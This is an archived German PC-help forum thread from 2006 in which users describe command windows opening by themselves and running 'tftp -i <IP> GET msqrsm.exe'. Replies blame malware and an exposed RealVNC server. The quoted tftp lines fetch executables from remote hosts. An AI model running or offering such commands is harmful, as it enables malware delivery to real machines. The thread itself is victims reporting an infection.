1. Liebe Forumsgemeinde,

    aufgrund der Bestimmungen, die sich aus der DSGVO ergeben, müssten umfangreiche Anpassungen am Forum vorgenommen werden, die sich für uns nicht wirtschaftlich abbilden lassen. Daher haben wir uns entschlossen, das Forum in seiner aktuellen Form zu archivieren und online bereit zu stellen, jedoch keine Neuanmeldungen oder neuen Kommentare mehr zuzulassen. So ist sichergestellt, dass das gesammelte Wissen nicht verloren geht, und wir die Seite dennoch DSGVO-konform zur Verfügung stellen können.
    Dies wird in den nächsten Tagen umgesetzt.

    Ich danke allen, die sich in den letzten Jahren für Hilfesuchende und auch für das Forum selbst engagiert haben. Ich bin weiterhin für euch erreichbar unter tti(bei)pcwelt.de.
    Dismiss Notice

CMD öffnet sich selbstständig

Discussion in 'Sicherheit' started by rt13_zrtnzna7qr, Sep 19, 2006.

Thread Status:
Not open for further replies.
  1. Hallo,
    bei mir hat sich heute während einer kurzen abwesenheit ein cmd-fenster geöffnet und in dem fenster stand folgendes drin:

    tftp -i 89.55.49.223 GET msqrsm.exe
    Zeitüberschreitung


    Hab ich einen Trojanes oder etwas ähnliches?
     
  2. deoroller

    deoroller Wandelndes Forum

  3. Wolfgang77

    Wolfgang77 Ganzes Gigabyte

    Das kannst du laut sagen, du hast mehr Probleme als dir lieb sind.. ;)
     
  4. deoroller

    deoroller Wandelndes Forum

    Wenn das ein Trojaner ist, ist er eigentlich schlecht programmiert.
    (Fenster vergessen zu verstecken)
     
  5. Logfile of HijackThis v1.99.1
    ...

    Log entfernt. TheDoctor
     
  6. deoroller

    deoroller Wandelndes Forum

  7. Die Hosts einträge sind korrekt; die wurden von mir selbst so eingetragen
     
  8. frajoti

    frajoti Viertel Gigabyte

    Einige IP-Adressen sind laut ripe.net nicht gültig. Sie lassen sich auch nicht anpingen. die IP-Adresse aus Deinem ersten Beitrag gehört zu Freenet:
     
  9. Wolfgang77

    Wolfgang77 Ganzes Gigabyte

    Hallo,

    vielleicht hat das etwas mit der Sache hier zu tun, da hattest du einen VNC Server isntalliert.. jetzt "file missing"..

    O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programme\RealVNC\VNC4\WinVNC4.exe" -service (file missing)
     
  10. dubdub

    dubdub ROM

    Ich hatte den gleichen Effekt
    (tftp -i 62.178.183.171 GET msqrsm.exe),
    obwohl NortonAntiVirus aktiv und aktuell war.

    Gibt es schon neue Erkenntnisse, ausser dass ich jetzt auch ein Problem habe ?
     
  11. Wolfgang77

    Wolfgang77 Ganzes Gigabyte

    Hallo,

    die IP-Adresse gehört zu (Hostmaster Chello, Broadband Internet Services in Österrreich). Von dort soll die "msqrsm.exe" geladen werden. Einziger Hinweis auf diese Datei über Google .. hier:
    http://www.worldspace.nu/&page=16
    Da hat einer auch das Problem und beschreibt noch dass sich da etwas selbstständig macht in einem Chat. Chello.. ist das dein Provider ? In dem HiJackThis-Log von dem TO war nicht zu sehen wie und wo das FTP-Programm gestartet wird.
     
  12. Nevok

    Nevok Ganzes Gigabyte

    Hallo rt13_zrtnzna7qr

    Die installierte Java-Version ist veraltet. Bitte deinstallieren und von http://java.sun.com/javase/downloads/index.jsp das Java Runtime Environment (JRE) 5.0 Update 8 herunterladen und installieren.

    Gruß
    Nevok
     
  13. Klaus28

    Klaus28 ROM

    Hallo,

    Ich war auch schon verzweifelt über ständig sich von alleine öffnende cmd Fenster, aus denen dann automatisch TFTP Befehlle mit GET auf Dateien wie Winsyst32.exe gestartet wurden, und dann auch noch ausgeführt wurden.

    Ich habe den REALVNC Server laufen! Über diese Schnittstelle scheinen die Befehle zu kommen.

    Nachdem ich die Portnummer in REALVNC geändert habe, und auch nur noch über sichere VNP Verbindungen arbeite,
    war Ruhe!

    Viel Grüße Klaus
     
Thread Status:
Not open for further replies.

Share This Page